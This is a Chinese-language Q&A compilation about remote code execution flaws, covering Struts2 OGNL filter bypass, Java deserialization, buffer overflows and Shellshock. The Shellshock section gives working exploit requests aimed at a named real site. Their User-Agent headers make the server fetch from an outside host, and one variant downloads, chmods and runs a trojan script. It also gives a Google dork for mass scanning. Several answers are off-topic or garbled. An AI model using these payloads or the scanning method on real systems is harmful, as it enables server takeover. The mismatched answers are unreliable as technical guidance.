遠程命令執行漏洞

1. java遠程代碼執行漏洞

struts2會將http的每個參數名解析為ongl語句執行(可理解為Java代碼)。 ongl表達式通過#來訪問struts的對象，struts框架通過過濾#字元防止安全問題，然而通過unicode編碼(\u0023)或8進制(\43)即繞過了安全限制。

2. java反序列化遠程命令執行漏洞怎麼檢測

可以參考這篇文章：http://www.freebuf.com/vuls/86566.html

本人雖然也有一定的研究，但不深入就不獻丑解說了。

可供下已發現的一些影響版本：

weblogic：
- 9.2.3.0
- 9.2.4.0
- 10.0.0.0
- 10.0.1.0
- 10.0.2.0
- 10.2.6.0
- 10.3.0.0
- 10.3.1.0
- 10.3.2.0
- 10.3.4.0
- 10.3.5.0
- 12.1.1.0

JBOSS:

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

此外還有 WebSphere，Jenkins 和 OpenNMS等，凡是使用了commons-collections.jar包的都會收到影響，此漏洞算是繼STRUTS2漏洞，心臟滴血漏洞後的一個重量級漏洞，建議盡快修補

3. 遠程代碼執行漏洞的意思難道是有人在監控我的電腦嗎謝謝

首先，這是一個提示，說你的電腦存有此漏洞，此漏洞可能會被遠程式控制制，是可能被控制，如果你覺得不安全，可以修復此漏洞，但漏洞部署越多越好，殺毒軟體一般都會提示的，希望能幫助你理解，呵呵

4. 什麼是本地提權漏洞和遠程代碼執行漏洞

這都是緩沖區溢出攻擊，是由於程序代碼的漏洞引起得，緩沖區溢出是指當計算機向緩沖區內填充數據位數時超過了緩沖區本身的容量溢出的數據覆蓋在合法數據上,理想的情況是程序檢查數據長度並不允許輸入超過緩沖區長度的字元,但是絕大多數程序都會假設數據長度總是與所分配的儲存空間相匹配,這就為緩沖區溢出埋下隱患.
如ms08004就是遠程執行漏洞，ms就是microsoft，08年4日的補丁，黑客通過快速的反匯編手段，知道漏洞的地方，然後製作針對的工具，用來抓肉雞。通常方法有掛馬個掃雞。
而本地溢出攻擊一般用在入侵伺服器中的提權，也就是本地提升伺服器許可權。如ms08025，就可以通過黑客精心構造的代碼，執行cmd命令，添加超級管理員！

5. windows遠程桌面遠程代碼執行漏洞怎麼產生的

可能是你把埠打開了，選擇我的電腦》屬性》遠程》把第二個選項框的勾去掉就可以了

6. 遠程代碼執行漏洞的漏洞原理

由於開發人員編寫源碼，沒有針對代碼中可執行的特殊函數入口做過濾，導致客戶端可以提交惡意構造語句提交，並交由伺服器端執行。命令注入攻擊中WEB伺服器沒有過濾類似system(),eval()，exec()等函數是該漏洞攻擊成功的最主要原因。

7. 如何使用NodeJS寫出一枚遠程命令執行漏洞

當我們寫了個NodeJS程序的時候，一般用node yourjsfile.js命令啟動該程序。但是如果程序中有東西出錯，這個進程就會退出。我們寫程序不可能保證萬無一失，肯定有些沒有處理的錯誤，這就讓很多人覺得NodeJS不穩定，容易產生很多故障。

8. 網站url遠程命令執行漏洞怎麼解決

打開騰訊電腦管家——工具箱——修復漏洞，進行漏洞掃描和修復。
管家可以自動修復漏洞：第一時間發現並修復系統存在的高危漏洞，在不打擾您的情況下自動為系統打上漏洞補丁，輕輕鬆鬆將病毒木馬拒之門外。自動修復漏洞 電腦管家可以在發現高危漏洞（僅包括高危漏洞，不包括其它漏洞）時，第一時間自動進行修復，無需用戶參與，最大程度保證用戶電腦安全

9. 遠程代碼執行漏洞是什麼意思

簡而言之，就是攻擊者可以利用這個漏洞對你上網進行攻擊，使你執行一些非預期的指令，甚至得到你的系統控制權。希望可以幫到你。

10. bash遠程命令執行漏洞 怎麼修復

從昨天開始，這個從澳大利亞遠渡重洋而來的BASH遠程命令執行漏洞就沸騰了整個FreeBuf，大家都在談論，「互聯網的心臟又出血了」，可是，親，到底怎麼對網站進行測試？下面這段腳本
$ env x=『() { :;}; echo vulnerable' bash -c "echo this is a test"

真的如各路大神們說的這樣嗎？
它與「心臟出血」漏洞不同，「心臟出血」只能藉助竊取用戶電腦信息，而bash 漏洞允許黑客遠程式控制制電腦，拿到系統最高許可權！其方法利用就更簡單了——復制/粘貼一行命令代碼即可！

Bash漏洞為什麼能夠執行

Bash漏洞的原理：
BASH除了可以將shell變數導出為環境變數，還可以將shell函數導出為環境變數！當前版本的bash通過以函數名作為環境變數名，以「（）{」開頭的字串作為環境變數的值來將函數定義導出為環境變數。
此次爆出的漏洞在於BASH處理這樣的「函數環境變數」的時候，並沒有以函數結尾「}」為結束，而是一直執行其後的shell命令。

簡單地說就是，Bash腳本在解析某些特殊字元串時出現邏輯錯誤導致可以執行後面的命令。
Bash漏洞與遠程執行有啥聯系
看到上面的解釋，很多童鞋都理解成了本地的漏洞，然後很多人又覺得，本地有啥可以利用的，於是就忽略了這個神級漏洞的存在。我想說的是，這個漏洞，利用熱度可以媲美當年的MS08-067，威力雖然弱了點，但遠程式控制制電腦還是可以的。
首先解釋一下cgi腳本。很多網站類似下面的鏈接：
GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1

後台不僅僅用python、Perl來解釋執行並反饋給客戶端Response，當然還可以換做bash腳本來解釋執行提交上來的GET/POST請求。所以，理論上，你在HTTP請求中插入一個Bash命令，比如
() { :;}; wget http://www.myvps.org/testvul.sh

如果伺服器的Bash解釋器具有這個漏洞，那麼在解釋上面這這句話的時候就會執行wget請求，將一個惡意的testvul.sh文件下載到這個伺服器，那為何說要放在HTTP頭部呢？比如：
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www..com
Connection: keep-alive

這是因為這個漏洞是bash解釋器在解釋某些特殊的變數時才可以觸發的：
在於BASH處理以「（）{」開頭的「函數環境變數」的時候，並沒有以函數結尾「}」為結束，而是一直執行其後的shell命令
通過自定義這些參數的值為「函數環境變數」的形式，就可以觸發後面的命令，惡意的客戶僅需要發送特殊構造的HTTP請求就可以使伺服器執行特定的命令（命令的許可權和解釋HTTP請求的Bash腳本環境相同）。
實際測試中，我的構造的測試請求：
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www..com
Connection: keep-alive

過程是這樣的：
我發送GET請求–>目標伺服器cgi路徑
目標伺服器解析這個get請求，碰到UserAgent後面的參數，Bash解釋器就執行了後面的命令
目標伺服器wget–>我的myvps.org
我的vps記錄下這個訪問的IP地址
然後查看我的myvps.org伺服器的訪問記錄，就可以確定目標有沒有去訪問，如果訪問了，那麼，很好，它是有漏洞的。下面是我的VPS接收到的wget請求訪問的日誌：

大神是這樣測試漏洞的

當然，你也可以這樣構造：
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www..com
Connection: keep-alive

實際上執行了下面三句：
/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh

你會發現，腳本就執行了，這就是Bash漏洞利用測試的精髓。
當然，你可以利用批量Google搜索：
filetype:cgi inurl:cgi-bin site:jp
然後批量提交類似的GET請求，你就能做到批量測試了。測試表明，500個url里有6-8個有bash漏洞